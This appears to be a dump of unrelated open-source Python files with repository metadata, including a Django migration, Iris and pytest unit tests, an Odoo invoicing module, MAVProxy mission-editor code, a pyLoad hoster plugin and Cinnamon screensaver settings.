# subprocess.call(['python', 'sendmail.py', '--filename', 'output_hotel_ref_*.csv', '--title', 'Ctrip_hotel_ref'])
if __name__ == '__main__':
ctripmultiplus()
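# Illustrative note (not from the original script): click exposes the two
# options declared above, so a typical invocation is
#
#     python ctripmultiplus.py --days 10 --span 5
#
# which shells out to ctripplus.py with --days 10, 20, 30, 40 and 50.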
|
xkmato/casepro
|
casepro/cases/migrations/0022_delete_mesageaction.py
|
Python
|
bsd-3-clause
| 697 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cases', '0021_migrate_case_contacts'),
('msgs', '0008_messageaction'),
]
operations = [
migrations.RemoveField(
model_name='messageaction',
name='created_by',
),
migrations.RemoveField(
model_name='messageaction',
name='label',
),
migrations.RemoveField(
model_name='messageaction',
name='org',
),
migrations.DeleteModel(
name='MessageAction',
),
]
|
pp-mo/iris
|
lib/iris/tests/unit/analysis/maths/test_divide.py
|
Python
|
lgpl-3.0
| 2,496 | 0 |
# Copyright Iris contributors
#
# This file is part of Iris and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
"""Unit tests for the :func:`iris.analysis.maths.divide` function."""
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
import numpy as np
import operator
from iris.analysis.maths import divide
from iris.cube import Cube
from iris.tests.unit.analysis.maths import (
CubeArithmeticBroadcastingTestMixin,
CubeArithmeticMaskingTestMixin,
CubeArithmeticCoordsTest,
)
@tests.skip_data
@tests.iristest_timing_decorator
class TestBroadcasting(
tests.IrisTest_nometa, CubeArithmeticBroadcastingTestMixin
):
@property
def data_op(self):
return operator.truediv
@property
def cube_func(self):
return divide
@tests.iristest_timing_decorator
class TestMasking(tests.IrisTest_nometa, CubeArithmeticMaskingTestMixin):
@property
def data_op(self):
return operator.truediv
@property
def cube_func(self):
return divide
def test_unmasked_div_zero(self):
# Ensure cube behaviour matches numpy operator behaviour for the
# handling of arrays containing 0.
dat_a = np.array([0.0, 0.0, 0.0, 0.0])
dat_b = np.array([2.0, 2.0, 2.0, 2.0])
cube_a = Cube(dat_a)
cube_b = Cube(dat_b)
com = self.data_op(dat_b, dat_a)
res = self.cube_func(cube_b, cube_a).data
self.assertArrayEqual(com, res)
def test_masked_div_zero(self):
# Ensure cube behaviour matches numpy operator behaviour for the
# handling of arrays containing 0.
dat_a = np.ma.array([0.0, 0.0, 0.0, 0.0], mask=False)
        dat_b = np.ma.array([2.0, 2.0, 2.0, 2.0], mask=False)
cube_a = Cube(dat_a)
cube_b = Cube(dat_b)
com = self.data_op(dat_b, dat_a)
res = self.cube_func(cube_b, cube_a).data
self.assertMaskedArrayEqual(com, res, strict=True)
class TestCoordMatch(CubeArithmeticCoordsTest):
def test_no_match(self):
cube1, cube2 = self.SetUpNonMatching()
with self.assertRaises(ValueError):
divide(cube1, cube2)
def test_reversed_points(self):
cube1, cube2 = self.SetUpReversed()
with self.assertRaises(ValueError):
divide(cube1, cube2)
if __name__ == "__main__":
tests.main()
|
adamwen829/instapush-py
|
setup.py
|
Python
|
mit
| 894 | 0.025727 |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:
import os
from setuptools import setup, find_packages
def get_version():
basedir = os.path.dirname(__file__)
with open(os.path.join(basedir, 'instapush/version.py')) as f:
locals = {}
exec(f.read(), locals)
return locals['VERSION']
raise RuntimeError('No version info found.')
setup(
name='instapush',
version = get_version(),
keywords = ('instapush', 'tools'),
    description = 'a python wrapper for instapush',
license = 'MIT License',
url = 'https://github.com/adamwen829/instapush-py',
author = 'Adam Wen',
author_email = 'adamwen829@gmail.com',
packages = find_packages(),
include_package_data = True,
platforms = 'any',
install_requires = ['requests']
)
|
stellaf/sales_rental
|
account_invoice_start_end_dates/models/account_invoice.py
|
Python
|
gpl-3.0
| 3,875 | 0 |
# -*- coding: utf-8 -*-
# © 2013-2016 Akretion (Alexis de Lattre <alexis.delattre@akretion.com>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError, UserError
class AccountInvoiceLine(models.Model):
_inherit = 'account.invoice.line'
start_date = fields.Date('Start Date')
end_date = fields.Date('End Date')
must_have_dates = fields.Boolean(
related='product_id.must_have_dates', readonly=True)
@api.multi
@api.constrains('start_date', 'end_date')
def _check_start_end_dates(self):
for invline in self:
if invline.start_date and not invline.end_date:
raise ValidationError(
_("Missing End Date for invoice line with "
"Description '%s'.")
% (invline.name))
if invline.end_date and not invline.start_date:
raise ValidationError(
_("Missing Start Date for invoice line with "
"Description '%s'.")
% (invline.name))
if invline.end_date and invline.start_date and \
invline.start_date > invline.end_date:
raise ValidationError(
                    _("Start Date should be before or be the same as "
                      "End Date for invoice line with Description '%s'.")
% (invline.name))
# Note : we can't check invline.product_id.must_have_dates
# have start_date and end_date here, because it would
# block automatic invoice generation/import. So we do the check
# upon validation of the invoice (see below the function
# action_move_create)
class AccountInvoice(models.Model):
_inherit = 'account.invoice'
def inv_line_characteristic_hashcode(self, invoice_line):
"""Add start and end dates to hashcode used when the option "Group
Invoice Lines" is active on the Account Journal"""
code = super(AccountInvoice, self).inv_line_characteristic_hashcode(
invoice_line)
hashcode = '%s-%s-%s' % (
code,
invoice_line.get('start_date', 'False'),
invoice_line.get('end_date', 'False'),
)
return hashcode
@api.model
def line_get_convert(self, line, part):
"""Copy from invoice to move lines"""
res = super(AccountInvoice, self).line_get_convert(line, part)
res['start_date'] = line.get('start_date', False)
res['end_date'] = line.get('end_date', False)
return res
@api.model
def invoice_line_move_line_get(self):
"""Copy from invoice line to move lines"""
res = super(AccountInvoice, self).invoice_line_move_line_get()
ailo = self.env['account.invoice.line']
for move_line_dict in res:
iline = ailo.browse(move_line_dict['invl_id'])
move_line_dict['start_date'] = iline.start_date
move_line_dict['end_date'] = iline.end_date
return res
@api.multi
def action_move_create(self):
"""Check that products with must_have_dates=True have
Start and End Dates"""
for invoice in self:
for iline in invoice.invoice_line_ids:
if iline.product_id and iline.product_id.must_have_dates:
if not iline.start_date or not iline.end_date:
raise UserError(_(
"Missing Start Date and End Date for invoice "
"line with Product '%s' which has the "
"property 'Must Have Start and End Dates'.")
% (iline.product_id.name))
return super(AccountInvoice, self).action_move_create()
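# Illustrative sketch (not from the upstream module): the hashcode override
# above appends the two dates to whatever key the parent method produced, so
# otherwise identical lines covering different periods are not merged when
# "Group Invoice Lines" is active. A plain-Python sketch of the resulting
# key (the parent code value is made up):
def _example_hashcode(parent_code, line):
    return '%s-%s-%s' % (
        parent_code,
        line.get('start_date', 'False'),
        line.get('end_date', 'False'),
    )
# _example_hashcode('ACME-400000', {'start_date': '2016-01-01',
#                                   'end_date': '2016-03-31'})
# -> 'ACME-400000-2016-01-01-2016-03-31'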
|
QualiSystems/shellfoundry
|
tests/test_utilities/config/test_config_record.py
|
Python
|
apache-2.0
| 5,062 | 0.001185 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
if sys.version_info >= (3, 0):
from unittest.mock import patch
else:
from mock import patch
from pyfakefs import fake_filesystem_unittest
from shellfoundry.utilities.config.config_context import ConfigContext
from shellfoundry.utilities.config.config_file_creation import ConfigFileCreation
from shellfoundry.utilities.config.config_record import ConfigRecord
class TestConfigRecord(fake_filesystem_unittest.TestCase):
def setUp(self):
self.setUpPyfakefs()
@patch(
"shellfoundry.utilities.config.config_file_creation.open", create=True
) # create=True to overcome the issue with builtin methods default fallback
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_create_config_file(self, echo_mock, open_mock):
# Arrange
cfg_path = "/quali/shellfoundry/global_config.yml"
open_mock.side_effect = [
IOError("Failed to create the file, maybe it is already exists")
]
# Act
cfg_creation = ConfigFileCreation()
# Assert
self.assertRaises(IOError, cfg_creation.create, cfg_path)
echo_mock.assert_any_call(
"Failed to create the file, maybe it is already exists"
)
echo_mock.assert_any_call("Failed to create config file")
@patch("shellfoundry.utilities.config.config_file_creation.open", create=True)
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_crate_config_file_due_to_already_exists_no_error_is_raised(
self, echo_mock, open_mock
):
# Arrange
cfg_path = "/quali/shellfoundry/global_config.yml"
open_mock.side_effect = [
IOError("Failed to create the file, maybe it is already exists")
]
# Act
with patch(
"shellfoundry.utilities.config.config_file_creation.os.path.exists"
) as path_mock:
path_mock.side_effect = [False, True, True]
ConfigFileCreation().create(cfg_path)
# Assert
echo_mock.assert_called_once_with("Creating config file...")
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_create_folder_hierarchy(self, echo_mock):
# Arrange
cfg_path = "/quali/shellfoundry/global_config.yml"
# Act
with patch(
"shellfoundry.utilities.config.config_file_creation.os.makedirs"
) as makedirs_mock:
makedirs_mock.side_effect = [
OSError("Failed to create the folders hierarchy")
]
self.assertRaises(OSError, ConfigFileCreation().create, cfg_path)
# Assert
echo_mock.assert_any_call("Failed to create config file")
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_save_new_record(self, echo_mock):
# Arrange
self.fs.create_file(
"/quali/shellfoundry/global_config.yml",
contents="""
install:
host: someaddress""",
)
# Act
with patch("shellfoundry.utilities.config.config_context.yaml") as yaml_mock:
yaml_mock.safe_load.side_effect = [Exception()]
context = ConfigContext("/quali/shellfoundry/global_config.yml")
record = ConfigRecord("key", "value")
record.save(context)
# Assert
echo_mock.assert_called_once_with("Failed to save key value")
file_content = self.fs.get_object(
"/quali/shellfoundry/global_config.yml"
).contents
import os
self.assertTrue(
file_content
== """
install:
host: someaddress""",
"Expected: {}{}Actual: {}".format(
"""
install:
host: someaddress""",
os.linesep,
|
file_content,
),
)
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_delete_record(self, echo_mock):
# Arrange
self.fs.create_file(
"/quali/shellfoundry/global_config.yml",
|
contents="""
install:
host: someaddress""",
)
# Act
with patch("shellfoundry.utilities.config.config_context.yaml") as yaml_mock:
yaml_mock.safe_load.side_effect = [Exception()]
context = ConfigContext("/quali/shellfoundry/global_config.yml")
record = ConfigRecord("host")
record.delete(context)
# Assert
echo_mock.assert_called_once_with("Failed to delete key")
file_content = self.fs.get_object(
"/quali/shellfoundry/global_config.yml"
).contents
import os
self.assertTrue(
file_content
== """
install:
host: someaddress""",
"Expected: {}{}Actual: {}".format(
"""
install:
""",
os.linesep,
file_content,
),
)
|
njoubert/MAVProxy
|
MAVProxy/modules/mavproxy_misseditor/__init__.py
|
Python
|
gpl-3.0
| 13,978 | 0.00651 |
#!/usr/bin/env python
'''
mission editor module
Michael Day
June 2014
'''
from MAVProxy.modules.lib import mp_module
from MAVProxy.modules.lib import mp_util
from MAVProxy.modules.mavproxy_misseditor import me_event
MissionEditorEvent = me_event
|
.MissionEditorEvent
from pymavlink import mavutil
import multiprocessing, time
import threading
import Queue
import traceback
class MissionEditorEventThread(threading.Thread):
def __init__(self, mp_misseditor, q, l):
threading.Thread.__init__(self)
self.mp_misseditor = mp_misseditor
self.event_queue = q
s
|
elf.event_queue_lock = l
self.time_to_quit = False
def run(self):
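        # Main loop: drain the mission editor's event queue (holding its lock
        # for at most ~0.6 s per pass) and translate each GUI event into the
        # corresponding wp/param/rally module calls.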
while not self.time_to_quit:
queue_access_start_time = time.time()
self.event_queue_lock.acquire()
request_read_after_processing_queue = False
while self.event_queue.qsize() > 0 and (time.time() - queue_access_start_time) < 0.6:
event = self.event_queue.get()
if event.get_type() == me_event.MEE_READ_WPS:
self.mp_misseditor.mpstate.module('wp').cmd_wp(['list'])
                    #list the rally points while I'm at it:
#TODO: DON'T KNOW WHY THIS DOESN'T WORK
#self.mp_misseditor.mpstate.module('rally').cmd_rally(['list'])
#means I'm doing a read & don't know how many wps to expect:
self.mp_misseditor.num_wps_expected = -1
self.wps_received = {}
elif event.get_type() == me_event.MEE_TIME_TO_QUIT:
self.time_to_quit = True
elif event.get_type() == me_event.MEE_GET_WP_RAD:
wp_radius = self.mp_misseditor.module('param').mav_param.get('WP_RADIUS')
if (wp_radius is None):
continue
self.mp_misseditor.gui_event_queue_lock.acquire()
self.mp_misseditor.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_WP_RAD,wp_rad=wp_radius))
self.mp_misseditor.gui_event_queue_lock.release()
elif event.get_type() == me_event.MEE_SET_WP_RAD:
self.mp_misseditor.param_set('WP_RADIUS',event.get_arg("rad"))
elif event.get_type() == me_event.MEE_GET_LOIT_RAD:
loiter_radius = self.mp_misseditor.module('param').mav_param.get('WP_LOITER_RAD')
if (loiter_radius is None):
continue
self.mp_misseditor.gui_event_queue_lock.acquire()
self.mp_misseditor.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_LOIT_RAD,loit_rad=loiter_radius))
self.mp_misseditor.gui_event_queue_lock.release()
elif event.get_type() == me_event.MEE_SET_LOIT_RAD:
loit_rad = event.get_arg("rad")
if (loit_rad is None):
continue
self.mp_misseditor.param_set('WP_LOITER_RAD', loit_rad)
#need to redraw rally points
# Don't understand why this rally refresh isn't lagging...
# likely same reason why "timeout setting WP_LOITER_RAD"
#comes back:
#TODO: fix timeout issue
self.mp_misseditor.mpstate.module('rally').rallyloader.last_change = time.time()
elif event.get_type() == me_event.MEE_GET_WP_DEFAULT_ALT:
self.mp_misseditor.gui_event_queue_lock.acquire()
self.mp_misseditor.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_WP_DEFAULT_ALT,def_wp_alt=self.mp_misseditor.mpstate.settings.wpalt))
self.mp_misseditor.gui_event_queue_lock.release()
elif event.get_type() == me_event.MEE_SET_WP_DEFAULT_ALT:
self.mp_misseditor.mpstate.settings.command(["wpalt",event.get_arg("alt")])
elif event.get_type() == me_event.MEE_WRITE_WPS:
self.mp_misseditor.module('wp').wploader.clear()
self.mp_misseditor.master.waypoint_count_send(event.get_arg("count"))
self.mp_misseditor.num_wps_expected = event.get_arg("count")
self.mp_misseditor.wps_received = {}
elif event.get_type() == me_event.MEE_WRITE_WP_NUM:
w = mavutil.mavlink.MAVLink_mission_item_message(
self.mp_misseditor.target_system,
self.mp_misseditor.target_component,
event.get_arg("num"),
event.get_arg("frame"),
event.get_arg("cmd_id"),
0, 1,
event.get_arg("p1"), event.get_arg("p2"),
event.get_arg("p3"), event.get_arg("p4"),
event.get_arg("lat"), event.get_arg("lon"),
event.get_arg("alt"))
self.mp_misseditor.module('wp').wploader.add(w)
self.mp_misseditor.master.mav.send(
self.mp_misseditor.module('wp').wploader.wp(w.seq))
#tell the wp module to expect some waypoints
self.mp_misseditor.module('wp').loading_waypoints = True
elif event.get_type() == me_event.MEE_LOAD_WP_FILE:
self.mp_misseditor.module('wp').cmd_wp(['load',event.get_arg("path")])
#Wait for the other thread to finish loading waypoints.
#don't let this loop run forever in case we have a lousy
#link to the plane
i = 0
while (i < 10 and
self.mp_misseditor.module('wp').loading_waypoints):
time.sleep(1)
i = i + 1
                    #don't modify queue while in the middle of processing it:
request_read_after_processing_queue = True
elif event.get_type() == me_event.MEE_SAVE_WP_FILE:
self.mp_misseditor.module('wp').cmd_wp(['save',event.get_arg("path")])
self.event_queue_lock.release()
            #if event processing operations require a mission refresh in GUI
#(e.g., after a load or a verified-completed write):
if (request_read_after_processing_queue):
self.event_queue_lock.acquire()
self.event_queue.put(MissionEditorEvent(me_event.MEE_READ_WPS))
self.event_queue_lock.release()
#periodically re-request WPs that were never received:
#DON'T NEED TO! -- wp module already doing this
time.sleep(0.2)
class MissionEditorModule(mp_module.MPModule):
'''
A Mission Editor for use with MAVProxy
'''
def __init__(self, mpstate):
super(MissionEditorModule, self).__init__(mpstate, "misseditor", "mission editor", public = True)
self.num_wps_expected = 0 #helps me to know if all my waypoints I'm expecting have arrived
self.wps_received = {}
from ..lib.multiprocessing_queue import makeIPCQueue
self.event_queue = makeIPCQueue()
self.event_queue_lock = multiprocessing.Lock()
self.gui_event_queue = makeIPCQueue()
self.gui_event_queue_lock = multiprocessing.Lock()
self.event_thread = MissionEditorEventThread(self, self.event_queue, self.event_queue_lock)
self.event_thread.start()
self.close_window = multiprocessing.Semaphore()
self.close_window.acquire()
self.child = multiprocessing.Process(target=self.child_task,args=(self.event_queue,self.event_queue_lock,self.gui_event_queue,self.gui_event_queue_lock,self.close_window))
self.child.start()
self.mpstate.miss_editor = self
self.last_unload_check_time = time.time()
self.unload_check_interval = 0.1 # seconds
self.time_to
|
rlindner81/pyload
|
module/plugins/hoster/RapiduNet.py
|
Python
|
gpl-3.0
| 3,047 | 0.001313 |
# -*- coding: ut
|
f-8 -*-
import time
import pycurl
from module.plugins.captcha.ReCaptcha import ReCaptcha
from module.plugins.internal.misc import json
from module.plugins.internal.SimpleHoster import SimpleHoster
class RapiduNet(SimpleHoster):
__name__ = "RapiduNet"
|
__type__ = "hoster"
__version__ = "0.14"
__status__ = "testing"
__pattern__ = r'https?://(?:www\.)?rapidu\.net/(?P<ID>\d{10})'
__config__ = [("activated", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
("fallback", "bool",
"Fallback to free download if premium fails", True),
("chk_filesize", "bool", "Check file size", True),
("max_wait", "int", "Reconnect if waiting time is greater than minutes", 10)]
__description__ = """Rapidu.net hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("prOq", None)]
COOKIES = [("rapidu.net", "rapidu_lang", "en")]
INFO_PATTERN = r'<h1 title="(?P<N>.*)">.*</h1>\s*<small>(?P<S>\d+(\.\d+)?)\s(?P<U>\w+)</small>'
OFFLINE_PATTERN = r'<h1>404'
ERROR_PATTERN = r'<div class="error">'
RECAPTCHA_KEY = r'6Ld12ewSAAAAAHoE6WVP_pSfCdJcBQScVweQh8Io'
def setup(self):
self.resume_download = True
self.multiDL = self.premium
def handle_free(self, pyfile):
self.req.http.lastURL = pyfile.url
self.req.http.c.setopt(
pycurl.HTTPHEADER,
["X-Requested-With: XMLHttpRequest"])
jsvars = self.get_json_response("https://rapidu.net/ajax.php",
get={'a': "getLoadTimeToDownload"},
post={'_go': ""})
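        # 'stop' means the free daily transfer quota is exhausted; otherwise
        # the value is the absolute unix timestamp at which the download may
        # start.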
if str(jsvars['timeToDownload']) == "stop":
t = (24 * 60 * 60) - (int(time.time()) %
(24 * 60 * 60)) + time.altzone
            self.log_info(_("You've reached your daily download transfer"))
# @NOTE: check t in case of not synchronised clock
self.retry(10, 10 if t < 1 else None, _("Try tomorrow again"))
else:
self.wait(int(jsvars['timeToDownload']) - int(time.time()))
self.captcha = ReCaptcha(pyfile)
response, challenge = self.captcha.challenge(self.RECAPTCHA_KEY)
jsvars = self.get_json_response("https://rapidu.net/ajax.php",
get={'a': "getCheckCaptcha"},
post={'_go': "",
'captcha1': challenge,
'captcha2': response,
'fileId': self.info['pattern']['ID']})
if jsvars['message'] == "success":
self.link = jsvars['url']
def get_json_response(self, *args, **kwargs):
res = self.load(*args, **kwargs)
if not res.startswith('{'):
self.retry()
self.log_debug(res)
return json.loads(res)
|
mattthur/Cinnamon
|
files/usr/lib/cinnamon-settings/modules/cs_screensaver.py
|
Python
|
gpl-2.0
| 16,729 | 0.003288 |
#!/usr/bin/env python2
from SettingsWidgets import *
from gi.repository import Gtk, Gdk, GLib, Pango
import os, json, subprocess, re
from xml.etree import ElementTree
import gettext
LOCK_DELAY_OPTIONS = [
(0, _("Immediately")),
(15, _("After 15 seconds")),
(30, _("After 30 seconds")),
(60, _("After 1 minute")),
(120, _("After 2 minutes")),
(180, _("After 3 minutes")),
(300, _("After 5 minutes")),
(600, _("After 10 minutes")),
(1800, _("After 30 minutes")),
(3600, _("After 1 hour"))
]
LOCK_INACTIVE_OPTIONS = [
(0, _("Never")),
(60, _("After 1 minute")),
(300, _("After 5 minutes")),
(600, _("After 10 minutes")),
(900, _("After 15 minutes")),
(1800, _("After 30 minutes")),
(2700, _("After 45 minutes")),
(3600, _("After 1 hour"))
]
XSCREENSAVER_PATH = "/usr/share/xscreensaver/config/"
def list_header_func(row, before, user_data):
if before and not row.get_header():
row.set_header(Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL))
class Module:
name = "screensaver"
category = "prefs"
comment = _("Manage screen lock settings")
def __init__(self, content_box):
keywords = _("screensaver, lock, password, away, message")
sidePage = SidePage(_("Screensaver"), "cs-screensaver", keywords, content_box, module=self)
self.sidePage = sidePage
def on_module_selected(self):
if self.loaded:
return
print "Loading Screensaver module"
schema = "org.cinnamon.desktop.screensaver"
self.settings = Gio.Settings.new(schema)
self.sidePage.stack = SettingsStack()
self.sidePage.add_widget(self.sidePage.stack)
# Screensaver
page = SettingsPage()
page.expand = True
self.sidePage.stack.add_titled(page, "screensaver", _("Screensaver"))
settings = ScreensaverBox(_("Select screensaver"))
page.pack_start(settings, True, True, 0)
# Settings
page = SettingsPage()
self.sidePage.stack.add_titled(page, "settings", _("Settings"))
settings = page.add_section(_("Lock settings"))
size_group = Gtk.SizeGroup.new(Gtk.SizeGroupMode.HORIZONTAL)
widget = GSettingsSwitch(_("Lock the computer when put to sleep"), "org.cinnamon.settings-daemon.plugins.power", "lock-on-suspend")
widget.set_tooltip_text(_("Enable this option to require a password when the computer wakes up from suspend"))
settings.add_row(widget)
widget = GSettingsSwitch(_("Lock the computer when the screen turns off"), schema, "lock-enabled")
widget.set_tooltip_text(_("Enable this option to require a password when the screen turns itself off, or when the screensaver activates after a period of inactivity"))
settings.add_row(widget)
widget = GSettingsComboBox(_("Delay before locking the screen"), schema, "lock-delay", LOCK_DELAY_OPTIONS, valtype="uint", size_group=size_group)
widget.set_tooltip_text(_("This option defines the amount of time to wait before locking the screen, after showing the screensaver or after turning off the screen"))
settings.add_reveal_row(widget, schema, "lock-enabled")
widget = GSettingsComboBox(_("Lock the computer when inactive"), "org.cinnamon.desktop.session", "idle-delay", LOCK_INACTIVE_OPTIONS, valtype="uint", size_group=size_group)
widget.set_tooltip_text(_("This option defines the amount of time to wait before locking the screen, when the computer is not being used"))
settings.add_row(widget)
settings = page.add_section(_("Away message"))
widget = GSettingsEntry(_("Show this message when the screen is locked"), schema, "default-message")
widget.set_child_packing(widget.content_widget, True, True, 0, Gtk.PackType.START)
widget.set_tooltip_text(_("This is the default message displayed on your lock screen"))
settings.add_row(widget)
settings.add_row(GSettingsFontButton(_("Font"), "org.cinnamon.desktop.screensaver", "font-message"))
widget = GSettingsSwitch(_("Ask for a custom message when locking the screen from the menu"), schema, "ask-for-away-message")
widget.set_tooltip_text(_("This option allows you to type a message each time you lock the screen from the menu"))
settings.add_row(widget)
# Date
page = SettingsPage()
self.sidePage.stack.add_titled(page, "date", _("Date"))
settings = page.add_section(_("Date and Time"))
size_group = Gtk.SizeGroup.new(Gtk.SizeGroupMode.HORIZONTAL)
widget = GSettingsSwitch(_("Use a custom date and time format"), schema, "use-custom-format")
settings.add_row(widget)
widget = GSettingsEntry(_("Time Format"), schema, "time-format", size_group=size_group)
settings.add_reveal_row(widget, schema, "use-custom-format")
widget = GSettingsEntry(_("Date Format: "), schema, "date-format"
|
, size_group=size_group)
settings.add_reveal_row(widget, schema
|
, "use-custom-format")
widget = GSettingsFontButton(_("Time Font"), "org.cinnamon.desktop.screensaver", "font-time", size_group=size_group)
settings.add_row(widget)
widget = GSettingsFontButton(_("Date Font"), "org.cinnamon.desktop.screensaver", "font-date", size_group=size_group)
settings.add_row(widget)
class ScreensaverBox(Gtk.Box):
def __init__(self, title):
Gtk.Box.__init__(self)
self.set_orientation(Gtk.Orientation.VERTICAL)
frame = Gtk.Frame()
frame.set_shadow_type(Gtk.ShadowType.IN)
frame_style = frame.get_style_context()
frame_style.add_class("view")
self.pack_start(frame, True, True, 0)
schema = "org.cinnamon.desktop.screensaver"
self.settings = Gio.Settings.new(schema)
self.webkit_executable = None
self.xscreensaver_executable = None
self.proc = None
self.current_name = self.settings.get_string("screensaver-name")
if self.current_name == "webkit@cinnamon.org":
self.current_name = self.settings.get_string("screensaver-webkit-theme")
elif self.current_name == "xscreensaver@cinnamon.org":
self.current_name = "xscreensaver-" + self.settings.get_string("xscreensaver-hack")
self.main_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
frame.add(self.main_box)
toolbar = Gtk.Toolbar.new()
Gtk.StyleContext.add_class(Gtk.Widget.get_style_context(toolbar), "cs-header")
label = Gtk.Label()
label.set_markup("<b>%s</b>" % title)
title_holder = Gtk.ToolItem()
title_holder.add(label)
toolbar.add(title_holder)
self.main_box.add(toolbar)
toolbar_separator = Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL)
self.main_box.add(toolbar_separator)
separator_context = toolbar_separator.get_style_context()
frame_color = frame_style.get_border_color(Gtk.StateFlags.NORMAL).to_string()
css_provider = Gtk.CssProvider()
css_provider.load_from_data(".separator { -GtkWidget-wide-separators: 0; \
color: %s; \
}" % frame_color)
separator_context.add_provider(css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)
self.socket_box = Gtk.Box()
self.socket_box.set_border_width(30)
self.socket_box.set_size_request(-1, 300)
self.socket_box.override_background_color(Gtk.StateFlags.NORMAL, Gdk.RGBA(0, 0, 0, 1))
self.main_box.pack_start(self.socket_box, False, False, 0)
self.main_box.add(Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL))
scw = Gtk.ScrolledWindow()
scw.expand = True
scw.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)
scw.set_shadow_type(Gtk.ShadowType.NONE)
self.main_box.pack_start(scw, True, True, 0)
self.list_box = Gtk.ListBox()
self.list_box.set_selection_mode(Gtk.SelectionMode.SINGLE)
self.list_box.set_h
|
jaraco/pytest
|
testing/test_collection.py
|
Python
|
mit
| 26,378 | 0.000986 |
import pytest, py
from _pytest.main import Session, EXIT_NOTESTSCOLLECTED
class TestCollector:
def test_collect_versus_item(self):
from pytest import Collector, Item
assert not issubclass(Collector, Item)
assert not issubclass(Item, Collector)
def test_compat_attributes(self, testdir, recwarn):
modcol = testdir.getmodulecol("""
def test_pass(): pass
def test_fail(): assert 0
""")
recwarn.clear()
assert modcol.Module == pytest.Module
assert modcol.Class == pytest.Class
assert modcol.Item == pytest.Item
assert modcol.File == pytest.File
assert modcol.Function == pytest.Function
def test_check_equality(self, testdir):
modcol = testdir.getmodulecol("""
def test_pass(): pass
def test_fail(): assert 0
""")
fn1 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn1, pytest.Function)
fn2 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn2, pytest.Function)
assert fn1 == fn2
assert fn1 != modcol
if py.std.sys.version_info < (3, 0):
assert cmp(fn1, fn2) == 0
assert hash(fn1) == hash(fn2)
fn3 = testdir.collect_by_name(modcol, "test_fail")
assert isinstance(fn3, pytest.Function)
assert not (fn1 == fn3)
assert fn1 != fn3
for fn in fn1,fn2,fn3:
assert fn != 3
assert fn != modcol
assert fn != [1,2,3]
assert [1,2,3] != fn
assert modcol != fn
def test_getparent(self, testdir):
modcol = testdir.getmodulecol("""
class TestClass:
def test_foo():
pass
""")
cls = testdir.collect_by_name(modcol, "TestClass")
fn = testdir.collect_by_name(
testdir.collect_by_name(cls, "()"), "test_foo")
parent = fn.getparent(pytest.Module)
assert parent is modcol
parent = fn.getparent(
|
pytest.Fu
|
nction)
assert parent is fn
parent = fn.getparent(pytest.Class)
assert parent is cls
def test_getcustomfile_roundtrip(self, testdir):
hello = testdir.makefile(".xxx", hello="world")
testdir.makepyfile(conftest="""
import pytest
class CustomFile(pytest.File):
pass
def pytest_collect_file(path, parent):
if path.ext == ".xxx":
return CustomFile(path, parent=parent)
""")
node = testdir.getpathnode(hello)
assert isinstance(node, pytest.File)
assert node.name == "hello.xxx"
nodes = node.session.perform_collect([node.nodeid], genitems=False)
assert len(nodes) == 1
assert isinstance(nodes[0], pytest.File)
class TestCollectFS:
def test_ignored_certain_directories(self, testdir):
tmpdir = testdir.tmpdir
tmpdir.ensure("build", 'test_notfound.py')
tmpdir.ensure("dist", 'test_notfound.py')
tmpdir.ensure("_darcs", 'test_notfound.py')
tmpdir.ensure("CVS", 'test_notfound.py')
tmpdir.ensure("{arch}", 'test_notfound.py')
tmpdir.ensure(".whatever", 'test_notfound.py')
tmpdir.ensure(".bzr", 'test_notfound.py')
tmpdir.ensure("normal", 'test_found.py')
for x in tmpdir.visit("test_*.py"):
x.write("def test_hello(): pass")
result = testdir.runpytest("--collect-only")
s = result.stdout.str()
assert "test_notfound" not in s
assert "test_found" in s
def test_custom_norecursedirs(self, testdir):
testdir.makeini("""
[pytest]
norecursedirs = mydir xyz*
""")
tmpdir = testdir.tmpdir
tmpdir.ensure("mydir", "test_hello.py").write("def test_1(): pass")
tmpdir.ensure("xyz123", "test_2.py").write("def test_2(): 0/0")
tmpdir.ensure("xy", "test_ok.py").write("def test_3(): pass")
rec = testdir.inline_run()
rec.assertoutcome(passed=1)
rec = testdir.inline_run("xyz123/test_2.py")
rec.assertoutcome(failed=1)
def test_testpaths_ini(self, testdir, monkeypatch):
testdir.makeini("""
[pytest]
testpaths = gui uts
""")
tmpdir = testdir.tmpdir
tmpdir.ensure("env", "test_1.py").write("def test_env(): pass")
tmpdir.ensure("gui", "test_2.py").write("def test_gui(): pass")
tmpdir.ensure("uts", "test_3.py").write("def test_uts(): pass")
        # when executing from the rootdir, only tests from the `testpaths`
        # directories are collected
items, reprec = testdir.inline_genitems('-v')
assert [x.name for x in items] == ['test_gui', 'test_uts']
# check that explicitly passing directories in the command-line
# collects the tests
for dirname in ('env', 'gui', 'uts'):
items, reprec = testdir.inline_genitems(tmpdir.join(dirname))
assert [x.name for x in items] == ['test_%s' % dirname]
# changing cwd to each subdirectory and running pytest without
